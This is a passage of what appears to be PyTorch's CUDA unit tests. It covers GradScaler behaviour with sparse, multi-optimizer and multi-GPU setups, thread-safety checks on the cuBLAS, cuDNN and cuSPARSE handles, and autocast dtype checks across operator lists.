i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_foreach_non_finite_check_and_unscale_ should report an overflow here.
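# (fp16 max is 65504, so the coalesced entry 64000 + 64000 = 128000 overflows to inf
# once the duplicate indices are summed.)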
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior; if it did not
# hold, GradScaler could misbehave in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
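# e.g. with init_scale=128, growth_factor=2.0 and the default backoff_factor of 0.5,
# unskipped=3 and skipped=1 should leave the scale at 128 * 2**3 * 0.5 = 512.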
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
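# Pattern exercised below: under GradScaler, torch.autograd.grad(scaler.scale(loss), ...)
# returns scaled grads, so they are multiplied by 1/scale before being folded into the
# penalty term; the final scaler.scale(loss).backward() / scaler.step() then run as usual.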
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
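# (With init_scale=128, growth_factor=2.0 and the default backoff_factor of 0.5,
# that is 128 * 2**3 * 0.5 = 512.)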
self.assertTrue(scaler.get_scale() == ((128. * scaler.get_growth_factor()**3 *
                                        scaler.get_backoff_factor()**1) if enabled else 1.0))
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == ((128. * scaler.get_growth_factor()**3 *
                                        scaler.get_backoff_factor()**1) if enabled else 1.0))
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be tuned very carefully.
# Too small a number makes the race condition hard to trigger,
# while too large a number can sometimes cause the test to hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cusparse handle,
# the following sequence may occur:
# thread 0 calls cusparseSetStream()
# thread 1 calls cusparseSetStream()
# thread 0 launches its raw sparse mm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its sparse mm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
